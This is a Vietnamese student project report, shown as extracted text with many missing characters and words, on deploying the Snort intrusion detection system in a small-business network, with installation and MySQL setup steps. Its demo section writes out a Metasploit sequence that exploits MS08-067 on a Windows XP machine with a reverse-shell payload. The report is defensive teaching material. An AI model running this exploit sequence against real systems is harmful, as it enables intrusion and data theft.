Tìm hiểu và triển khai hệ thống phát hiện xâm nhập ids snort tại các doanh nghiệp vừa và nhỏ

86 1.2K 4
Tìm hiểu và triển khai hệ thống phát hiện xâm nhập ids snort tại các doanh nghiệp vừa và nhỏ

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Tìm hiểu và triển khai hệ thống phát hiện xâm nhập ids snort tại các doanh nghiệp vừa và nhỏ

TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ LỜI CẢM ƠN Em xin gửi lời cảm ơn tới thầy cô môn, khoa Công nghệ thông tin, trường Đại Học Duy Tân Đà Nẵng , tạo điều kiện cho em thực đồ án chuyên ngành Xin chân thành cảm ơn thầy giáo ThS Nguyễn Minh Nhật tận tình hướng dẫn, giúp đỡ em hồn thành đồ án Cuối cùng, em xin bày tỏ lịng biết ơn đến gia đình bạn bè giúp đỡ, động viên em nhiều suốt trình học tập làm đồ án giúp đỡ chia sẻ cho em kinh nghiệm quý giá q trình em thực tập cơng ty để em hồn thành Mặc dù có nhiều cố gắng thời gian trình độ có hạn nên chắn đồ án cịn có nhiều thiếu sót Em mong nhận ý kiến đóng góp q báu từ thầy bạn Cuối tơi kính chúc q Thầy, Cơ sức khỏe đạt nhiều thành công tốt đẹp sống Trang TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ MỤC LỤC CHƯƠNG I: TỔNG QUAN VỀ AN NINH MẠNG VÀ HỆ THỐNG PHÁT HIỆN XÂM NHẬP -LỜI CẢM ƠN MỤC LỤC DANH MỤC CÁC TỪ VIẾT TẮT 1.1 BẢO MẬT HỆ THỐNG DANH MỤC HÌNH 1.1.1 Khái niêm bảo mật 1.1.2 Sự cần thiết bảo mật LỜI NĨI ĐẦU 1.3.1 Mối đe dọa khơng có cấu trúc ( Untructured threat) 1.3.2 Mối đe dọa có cấu trúc ( Structured threat) 1.3.3 Mối đe dọa từ bên (External threat) 1.3.4 Mối đe dọa từ bên trong( Internal threat ) 1.2 GIỚI THIỆU VỀ HỆ THỐNG PHÁT HIỆN XÂM NHẬP IDS (IDS – INTRUSION DETECTION SYSTEM) 1.2.1 Định nghĩa hệ thống phát xâm nhập – IDS 1.2.2.Lợi ích tầm quan trọng hệ thống IDS 1.2.3.1 Lợi ích hệ thống IDS 1.2.3.2 Tầm quan trọng hệ thống IDS 1.2.3.PHÂN LOẠI 1.2.4.1 NIDS (Netword Intrusion Detection System) 1.2.4.1.HIDS (Host Intrusion Detection System) 1.2.5.KIẾN TRÚC CỦA IDS 1.2.5.1.Các nhiệm vụ thực 1.2.5.2 Kiến trúc hệ thống phát xâm nhập IDS 1.2.6 NGUYÊN LÝ HOẠT ĐỘNG 1.2.6.1 Sơ lượt hoạt động hệ thống 1.2.6.2 Xử lý kiểm định Online 1.2.6.3 Phát dấu hiệu khơng bình thường 1.2.6.4 Các mẫu hành vi thơng thường- phát bất thường Trang TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ 1.2.6.5 Các dấu hiệu có hành vi xấu – phát dấu hiệu 1.2.6.6 Tương quan mẫu tham số 1.2.7 CÁCH PHÁT HIỆN CÁC KIỂU TẤN CÔNG THÔNG DỤNG CỦA IDS 1.5.1.Denial of Service attack (Tấn công từ chối dịch vụ) 1.5.2.Scanning Probe (Quét thăm dò) 1.5.3.Password attack (Tấn công vào mật mã) 1.5.4.Privilege-grabbing (Chiếm đặc quyền) 1.5.5.Hostile code insertion (Cài đặt mã nguy hiểm) 1.5.6.Cyber vandalism (Hành động phá hoại máy móc) 1.5.7.Proprietary data theft (Ăn trộm liệu quan trọng) 1.5.8.Fraud, waste, abuse (Gian lận, lãng phí lạm dụng) 1.5.9.Audit trail tampering (Can thiệp vào biên bản) 1.5.10.Security infrastructure attack (Tấn công hạ tầng bảo mật) CHƯƠNG II: HỆ THỐNG SNORT 2.1 SNORT VÀ NGUYÊN LÝ HOẠT ĐỘNG 2.1.1 Tổng quan SNORT 2.1.2 Nguyên lý hoạt động 2.2 CÁC THÀNH PHẦN VÀ CHỨC NĂNG 2.2.1 Bộ giải mã gói (Packet Decoder) 2.2.2 Bộ tiền xử lý (Preprocessor) 2.2.3 Bộ phát (Detection Engine) 2.2.4 Hệ thống ghi cảnh báo (Logging Alerting System) 2.2.5 Bộ phận đầu (Output Modules) 2.3 BỘ LUẬT CỦA SNORT 2.3.1 Giới thiệu 2.3.2 Cấu trúc luật Snort 2.4 CHẾ ĐỘ NGĂN CHẶN CỦA SNORT: SNORT – INLINE 2.4.1 Tích hợp khả ngăn chặn vào Snort Trang TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ 2.4.2 Những bổ sung cho cấu trúc luật Snort hỗ trợ Inline mode 2.5 CÁC CƠ CHẾ HOẠT ĐỘNG CỦA SNORT 2.5.1 Sniffer 2.5.2 Packet logger 2.5.3 NIDS 2.6 NHỮNG ĐIỀU CẦN LƯU Ý 2.6.1 Vị trí cảm biến 2.6.2 Các hệ thống mạng phải giám sát 2.6.3 Tạo điểm kết nối 2.6.4 Lưu lượng mã hóa 2.6.5 Bảo mật cảm biến Snort CHƯƠNG 3: TRIỂN KHAI HỆ THỐNG SNORT 3.1 GIỚI THIỆU KỊCH BẢN 3.2 THỰC HIỆN 3.2.1 Cài đặt cấu hình 3.2.2 CÀI SNORT VÀ GĨI BỔ TRỢ 3.3 DEMO SNORT Trang TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ KẾT LUẬN DANH MỤC CÁC TỪ VIẾT TẮT TÀI LIỆU THAM KHẢO Cụm từ Ý nghĩa IDS NIDS DoS HIDS OSI OS SSL SSH DMZ CPU PIDS Intrusion Detection System Network Base Intrusion Detection System Denial of Service Host Base Intruction Detection System Open Systems Interconnection Operating System Secure Socket Layer Secure Shell demilitarized zone Central Processing Unit Protocol based Intrucsion Detection System Application Protocol Based Intrusion APIDS HTTP URL TCP SNMP UDP Detection System Hypertext Transfer Protocol Uniform Resource Locator Transmission Control Protocol Simple Network Management Protocol User Datagram Protocol Trang TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ DANH MỤC HÌNH VẼ Trang TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ LỜI NÓI ĐẦU GIỚI THIỆU Bảo mật vấn đề lớn tất mạng môi trường doanh nghiệp ngày Hacker Intruder (kẻ xâm nhập) nhiều lần thành công việc xâm nhập vào mạng cơng ty đem ngồi nhiều thơng tin giá trị Đã có nhiều phương pháp phát triển để đảm bảo cho hạ tầng mạng giao tiếp Internet như: Sử dụng firewall, encryption (mã hóa), VPN (mạng riêng ảo)…trong có hệ thống phát triển xâm nhập Phát xâm nhập tập công nghệ phương thức dung để phát hành động khả nghi host mạng Các phương pháp phát xâm nhập bắt đầu xuất năm gần Sử dụng phương thức phát xâm nhập bắt đầu xuất năm gần Sử dụng phương thức phát xâm nhập, bạn thu thập, sử dụng thông tin từ loại cơng biết để tìm cố gắng công vào mạng hay máy cá nhân Thơng tin thu thập theo cách sử dụng cho mạng an tồn hơn, hồn toàn hợp pháp, sản phẩm thương mại mã nguồn mở sẵn có cho mục đích Hệ thống phát xâm nhập IDS (Intrusion Detection System) phương pháp bảo mật có khả phát chống lại kiểu công mới, vụ lạm dụng, dùng sai xuất phát từ hệ thống hoạt động tốt với phương pháp bảo mật truyền thống Nó nghiên cứu, phát triển, ứng dụng từ lâu giới thể vai trị quan trọng sách bảo mật Mặc dù phương pháp phát xâm nhập cịn mới, IDS giữ vị trí hệ thống chất lượng thuộc loại top (hàng đầu) ngày Từ vấn đề nêu trên, thực đồ án với mong muốn không giúp bạn hiểu kiến thức chung hệ thống IDS, mà cịn giúp bạn tự xây dựng hệ thống IDS phù hợp với yêu cầu sử dụng ứng dụng rộng rãi thực tiễn Trang TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ Ý NGHĨA CỦA ĐỀ TÀI Hiện vụ vi phạm bảo mật ngày tinh vi với gia tăng vụ lạm dụng, dùng sai xuất phát từ hệ thống mà phương pháp bảo mật truyền thống không chống Từ vấn đề nêu trên, thực đồ án với mong muốn không nghiên cứu đặc trưng hệ thống phát xâm nhập trái phép với vai trò phương pháp dị tìm phát xâm nhập mạng SNORT bổ sung cho phương pháp bảo mật tại, mà cịn ứng dụng vào thực tiễn nhằm nâng cao tính bảo mật, đảm bảo an toàn cho hệ thống chất lượng dịch vụ cho người dùng MỤC TIÊU CỦA ĐỀ TÀI - Tìm hiểu, tổng hợp phân tích vấn đề liên quan đến hệ thống dị tìm phát xâm nhập IDS - Tìm hiểu nghiên cứu vấn đề liên quan đến chương trình snort - Tìm hiểu phương pháp triển khai thử nghiệm cài đặt Snort NIDS hệ linux ĐỐI TƯỢNG VÀ PHẠM VI NGHIÊN CỨU - Hệ thống dị tìm phát xâm nhập IDS - Hệ thống HIDS Snort - Xây dựng hệ thống snort IDS linux PHƯƠNG PHÁP NGHIÊN CỨU Đề tài sử dụng phương pháp nghiên cứu sau : - Tổng hợp kết nghiên cứu từ tư liệu liên quan - Phân tích đánh giá phương pháp đưa giải pháp lựa chọn - Xây dựng thử nghiệm mô hình Trang TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ CHƯƠNG I: TỔNG QUAN VỀ AN NINH MẠNG VÀ HỆ THỐNG PHÁT HIỆN XÂM NHẬP 1.1 BẢO MẬT HỆ THỐNG 1.1.1 Khái niêm bảo mật Để bảo vệ hệ thống đề sách bảo mật ta cần hiểu sâu khái niệm bảo mật Khi hiểu sâu khái niệm bảo mật, phân tích xác cơng, phân tích điểm yếu hệ thống tăng cường bảo mật vùng cần thiết làm giảm thiệt hại gây nên từ công Sau khía cạnh quan trọng bảo mật mà ta cần phải quan tâm đến nhằm gia tăng độ an toàn cho hệ thống: - Xác thực (Authentication): tiến trình xử lý nhằm xác định nhận dạng thực thể liên kết Thực thể người dùng độc lập hay tiến trình phần mềm - Ủy quyền (Authorization): luật xác định có quyền truy nhập vào tài nguyên hệ thống - Tính cẩn mật (Confidentiality): nhằm đảm bảo liệu bảo vệ khỏi nhóm khơng phép truy nhập Tính cẩn mật yêu cầu liệu máy liệu truyền mạng đọc nhóm phép - Tính tồn vẹn (Integrity): hệ thống đảm bảo tính tồn vẹn liệu ngăn thay đổi liệu trái phép Sự thay đổi bao gồm tạo, ghi, sửa đổi, xóa xem lại thơng điệp truyền - Tính sẵn sàng (Availability): yêu cầu tài sản hệ máy tính sẵn sàng nhóm phép Mục tiêu kiểu công từ chối dịch vụ DoS phá hoại tính sẵn sàng tài nguyên hệ thống, bao gồm tạm thời lâu dài Trang TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ 1.1.2 Sự cần thiết bảo mật Hiện Internet phủ khắp toàn cầu, tham gia vào gần tất hoạt động kinh doanh lĩnh vực đời sống xã hội, với việc phát triển nhanh chóng mối đe dọa bảo mật, cơng Internet Càng có nhiều khả truy nhập có nhiều hội cho kẻ công, bảo mật hiệu quả, hệ thống bạn làm việc tốt mà khơng cần lo lắng việc tăng nguy bị cơng 1.3.1 Mối đe dọa khơng có cấu trúc ( Untructured threat) Hầu hết cơng khơng có cấu trúc gây Script Kiddies (những kẻ công sử dụng công cụ cung cấp, khơng có có khả lập trình) hay người có trình độ vừa phải Hầu hết cơng sở thích cá nhân, có nhiều cơng có ý đồ xấu Mặc dù tính chun mơn cơng dạng khơng cao mối nguy hại lớn 1.3.2 Mối đe dọa có cấu trúc ( Structured threat) Structured threat hành động cố ý, có động kỹ thuật cao Khơng Script Kiddes, kẻ cơng có đủ kỹ để hiểu cơng cụ, chỉnh sửa công cụ tạo cơng cụ Động thường thấy tiền, hoạt động trị, tức giận hay báo thù Các cơng thường có mục đích từ trước Các công thường gây hậu nghiêm trọng cho hệ thống Một cơng structured thành cơng gây nên phá hủy cho tồn hệ thống Trang 10 TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ nằm client server giải nhiệm vụ mã hóa lưu lượng Lưu lượng từ web server đến proxy SSL không mã hóa cịn lưu lượng từ proxy web client mã hóa Đặt cảm biến Snort web server proxy cho phép lưu lượng giám sát.Một ưu điểm khác cách thực thi khả chuyển trách nhiệm mã hóa CPU cho thiết bị ủy quyền, cho phép web server hoạt động hiệu Các proxy SSL thường thực nhiệm vụ khác cân tải xác thực 2.6.5 Bảo mật cảm biến Snort Một điều hiển nhiên bảo vệ hệ thống chịu trách nhiệm giám sát trì bảo mật cho mạng việc quan trọng Bạn không cần bảo vệ hệ thống NIDS mà phải bảo vệ server syslog, server xác thực, công cụ giám sát quản trị Một kiểu triển khai mạng quản trị Mạng có firewall riêng truy cập đến chịu điều khiển chặt chẽ Firewall mở cần cho việc giám sát lưu lượng Việc quản lý chặt chẽ hệ thống Snort quan trọng Các hệ điều hành nên cấu hình theo chuẩn cơng nghiệp thường xuyên cập nhật vá lỗi, cập nhật Xét cho cùng, cảm biến IDS truy cập đến hầu hết hệ thống nhạy cảm bạn – tình nguy hiểm CHƯƠNG 3: TRIỂN KHAI HỆ THỐNG SNORT Trang 72 TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ 3.1 GIỚI THIỆU KỊCH BẢN Công ty TNHH NHẬT MINH công ty hoạt động lĩnh vực phân phối sản phẩm hổ trợ máy thiết bị điện tử máy tính, máy in điện thoại…, hoạt động kinh doanh chủ yếu thông qua Internet nên Hệ Thống Mạng Công ty xậy dựng lớn, đáp ứng yêu cầu đảm bảo hoạt động liên tục, bảo mật cao Yêu cầu bảo mật Công ty: - Đảm bảo an toàn giao dịch qua Internet - Giám sát trình làm việc Nhân Viên - Đảm bảo an toàn cho Server chạy ứng Phần mềm Công ty, đảm bảo việc lưu, phục hồi liệu, tránh trường hợp bị Hacker cơng vào Server Database Mơ hình hạ tầng mạng cơng ty: Hình 3.1 Mơ hình mạng cơng ty CÁC CHUN Trang 73 TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ Tình đặt ra: Khi nhân viên biểu bất thường mạng hay người internet xâm nhập thăm dị mạng, qt tìm lỗi hệ thống mạng công ty, xây dựng sơ đồ mạng bảo đảm tính sẳn sàng cho hệ thống, đối phó với cơng từ ngồi nào? Làm phát kịp thời để có cách phịng ngăn chăn ? Giải pháp: Xây dựng mơ hình kết hợp với hệ thống dị tìm phát xâm nhập IDS phương pháp hiệu để giúp người quản trị luôn nắm tình hình trạng thái mạng, chọn hai mơ hình NIDS HIDS, kết hợp hai lại với Hình 3.2 Mơ hình giải pháp kết hợp IDS Khi bị công hệ thống snort phát xâm nhập đưa cảnh báo cho người quản trị, thông tin công lỗi hệ thống, tất thông tin lưu vào hệ thống sở liệu 3.2 THỰC HIỆN Trang 74 TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS-SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ 3.2.1 Cài đặt cấu hình 3.2.1.1 Download SNORT Rule Để download snort ta vào trang web snort: www.snort.org Chọn download snort chọn thư mục snort-2.9.2.tar.gz tải Sau trở lại trang chủ tiếp tục tải xuống tập luật (Get Rule) Hình 3.3 Giao diện down Rule Snort 3.2.2 CÀI SNORT VÀ GÓI BỔ TRỢ 3.2.2.1 Cài gói bổ trợ Lần lượt cài gói phụ thuộc: bước thực hiên terminal - mysql mysql-bench mysql-server mysql-devel yum-utils php-mysql httpd gcc pcre-devel - php-gd gd distcache-devel mod_ssl glib2-devel gcc-c++ libpcap-devel php php-pear Trang 75 3.2.2.2 Cài đặt snort Giải nén snort tar -zxvf snort-2.9.2.tar.gz cd snort-2.9.2.tar.gz Lần lượt thực sau để cài đặt snort #./configure with-mysql enable-dynamicplugin 3.2.2.3 Cấu hình snort Tạo thư mục hoạt động cho snort mkdir /etc/snort mkdir /etc/snort/rules mkdir /var/log/snort Chép file cấu hình cd etc/ cp * /etc/snort 3.2.2.4 Cài đặt tập rule cho snort Tải rule từ http://www.snort.org Giải nén tar -xzvf snortrules-snapshot-2905.tar.gz cd rules cp * /etc/snort/rules 3.2.2.5.Thiết Lập Snort khởi động hệ thống Tạo liên kết mềm (symbolic link) file snort binary đến /usr/sbin/snort ln -s /usr/local/bin/snort /usr/sbin/snort Snort cung cấp scrip để khởi động thư mục rpm/ ; (thư mục giải nén snort) cp /snort/snort-2.9.2/rpm/snortd /etc/init.d/ cp /snort/snort-2.9.2/rpm/snort.sysconfig /etc/sysconfig/snort Đặt quyền lại cho file snortd : chmod 755 /etc/init.d/snortd chkconfig snortd on service snortd start Để khởi động snort chế độ debug bạn muốn kiểm tra lỗi: /snort/ snort-2.9.2/src/snort -u snort Cài đặt ACIDBASE: acidebase để thị cảnh báo snort #apt-get install acidbase Quá trình cài sẻ có lựa chọn chương trình để lấy liệu, ta chọn mysql Chọn Mysql cho ACIDBASE Tiếp theo, nhập mật acidbase để đọc liệu từ mysql, ta nhập 123456 đặt Snort-mysql #apt-get install snort-mysql Snort yêu cầu nhập địa mạng cần giám sát, ta nhập 192.168.16.0/24 Snort yêu cầu lưu liệu vào Mysql Snort hướng dẫn cách import database snort vào mysql Cài Mysql-Server #apt-get install mysql-server Mysql-Server yêu cầu nhập mật quản trị root, nhập 123456 Cấu hình MySQL # mysql –u root –p password mysql(123456) root Khai báo: >create database snort; >create user snort@localhost; >set password FOR snort@localhost=PASSWORD(‘123456’); >grant INSERT,SELECT on root.* to snort@localhost; >grant CREATE,INSERT,SELECT,DELETE,UPDATE on snort.* to snort@localhost; >grant CREATE,INSERT,SELECT,DELETE,UPDATE on snort.* to snort; Import databsase snort vào mysql: # cd /usr/share/doc/snort-mysql # zcat create_mysql.gz | mysql -u snort -h localhost -p snort Kiểm tra snort có table chưa: #mysql –p >use snort; >show tables; Cấu hình snort: # rm /etc/snort/db-pending-config # dpkg configure –pending # dpkg-reconfigure snort-mysql Yêu cầu chọn cấu hình snort, chọn boot Chọn card eth0 Nhập địa mạng giám sát : 192.168.16.0/24 Mở trình duyệt, gõ 192.168.16.12/base/base_main.php Hình 3.4 Giao diện base 3.3 DEMO SNORT Khi hacker (back track 5) cơng xâm nhập máy tính người dùng hệ thống (XP SP 3), nhờ khai thác lỗi (MS08-067) hệ điều hành windows XP SP3 xâm chiếm để lấy cắp thơng tin Hình 3.5 Mơ hình Demo KẾT QUẢ THỰC HIỆN Bước 1: Tìm lỗi hệ thống sử dụng máy BACK TRACK Vào hình Termina #root@bt:~#msfconsole msf > search "ms08_067" Gõ lênh sử dụng lỗi hệ thống: msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show payloads msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 192.168.16.11 msf exploit(ms08_067_netapi) > set LHOST 192.168.16.10 msf exploit(ms08_067_netapi) >show options msf exploit(ms08_067_netapi) >exploit KẾT LUẬN 1.Kết đạt Đề tài sâu phân tích làm rõ nét tổng quan hệ thống dị tìm phát xâm nhập, hệ thống Snort HIDS Và qua đó, đề tài triển khai thử nghiệm Snort Linux Những phần chưa đạt Đề tài nhiều thiếu sót Chưa sâu đánh giá giải thích nguyên tắc hoạt động cụ thể IDS, Snort… Phần lý thuyết tổng quát chỉ sơ lược tóm tắt chưa sâu nghiên cứu vấn đề Phần thử nghiệm để mô chưa thật hoạt động bình thường Hướng mở rộng - Khai thác thuật toán xử lý hệ thống IDS - Phương pháp lập trình Rule cho snort - Triển khai hệ thống Snort dòng OS khác TÀI LIỆU THAM KHẢO Tài liệu tiếng Việt [1] Nguyễn Thúc Hải, Mạng máy tính hệ thống mở, NXB Giáo dục, 1999 [2] Nguyễn Phương Lan, Hoàng Đức Hải, Lập trình LINUX, NXB Giáo Dục, 2001 [3] Nguyễn Ngọc Tuấn, Công nghệ bảo mật, NXB Thống Kê, 2005 [4] Phạm Hoàng Dũng, Linux tự học 24 giờ, NXB Thống Kê, 2005 Tài liệu tiếng Anh [5] Rafeeq Rehman, Intrusion Detection with Snort, NXB Prentice Hall, 2003 [6] Martin Roesch, Chris Green ,Snort User Manual, The Snort Project, 2003 Websites [7] http://www.quantrimang.com.vn/hedieuhanh/linux/83444_Cai-dat-Apache2- voi-PHP5-va-ho-tro-MySQL-tren-Ubuntu-11-10-LAMP.aspx [8] https://help.ubuntu.com/10.04/serverguide/C/mysql.html [9] http://www.youtube.com/watch?v=FzKdaiUZUwM [10] http://shoptinhoc.com/diendan/tin-hoc-can-ban/40472-cach-noi-mang-giua- may-ao-su-dung-vmware-voi-may-va-internet.html [11] http://quantrinet.com/forum/showthread.php?t=2855 [12] http://www.slideshare.net/phanleson/snort [13] http://rootbiez.blogspot.com/2009/08/hacking-he-thong-phat-hien-xam- nhap-ids.html [14] http://www.giaiphaphethong.net/bao-mat-mang/104-gioi-thieu-he-thongtu-dong-phat-hien-xam-nhap-ids.html ... TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS- SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ DANH MỤC HÌNH VẼ Trang TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS- SNORT TẠI CÁC DOANH NGHIỆP... nguy hiểm cho hệ thống Trang 11 TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS- SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ 1.2 GIỚI THIỆU VỀ HỆ THỐNG PHÁT HIỆN XÂM NHẬP IDS (IDS – Intrusion... hình Trang TÌM HIỂU VÀ TRIỂN KHAI HỆ THỐNG PHÁT TRIỂN XÂM NHẬP IDS- SNORT TẠI CÁC DOANH NGHIỆP VỪA VÀ NHỎ CHƯƠNG I: TỔNG QUAN VỀ AN NINH MẠNG VÀ HỆ THỐNG PHÁT HIỆN XÂM NHẬP 1.1 BẢO MẬT HỆ THỐNG 1.1.1

Ngày đăng: 20/08/2015, 16:31

Từ khóa liên quan

Mục lục

  • Hình 1.3. Mô hình hệ thống

    • 1.2.4.1 . NIDS (Netword Intrusion Detection System)

    • 1.2.4.1. HIDS (Host Intrusion Detection System)

    • Hình 1.5. Mô hình HIDS

      • 1.2.5.1. Các nhiệm vụ thực hiện

      • Hình 1.7. Cơ sở hạ tầng IDS

        • 1.2.5.2. Kiến trúc của hệ thống phát hiện xâm nhập IDS

        • Hình1.8. Kiến trúc hệ thống IDS

          • 1.2.6. NGUYÊN LÝ HOẠT ĐỘNG

            • 1.2.6.1. Sơ lượt về hoạt động của hệ thống

            • 1.2.6.2. Xử lý kiểm định Online

            • 1.2.6.3. Phát hiện dấu hiệu không bình thường

            • 1.2.6.4. Các mẫu hành vi thông thường- phát hiện bất thường

            • 1.2.6.5. Các dấu hiệu có hành vi xấu – phát hiện dấu hiệu

            • 1.2.6.6. Tương quan các mẫu tham số

            • 1.2.7. CÁCH PHÁT HIỆN CÁC KIỂU TẤN CÔNG THÔNG DỤNG CỦA IDS

            • CHƯƠNG II: HỆ THỐNG SNORT

              • 2.1.2. Nguyên lý hoạt động

              • Hình 2.1. Kiến trúc các thành phần của Snort

                • 2.2. CÁC THÀNH PHẦN VÀ CHỨC NĂNG

                  • 2.2.1. Bộ giải mã gói (Packet Decoder)

                  • 2.2.2. Bộ tiền xử lý (Preprocessor)

                  • Hình 2.2. Bộ tiền xử lý (Preprocessor)

                    • 2.2.3. Bộ phát hiện (Detection Engine)

                    • Hình 2.3. Bộ phát hiện (Detection Engine)

                      • 2.2.4. Hệ thống ghi và cảnh báo (Logging và Alerting System)

                      • 2.2.5. Bộ phận đầu ra (Output Modules)

                      • Hình 2.4. Bộ phận đầu ra (Output Modules)

                        • 2.3. BỘ LUẬT CỦA SNORT

                          • 2.3.1. Giới thiệu

                          • 2.3.2. Cấu trúc luật của Snort

                          • Hình 2.5.Cấu trúc luật của Snort

Tài liệu cùng người dùng

Tài liệu liên quan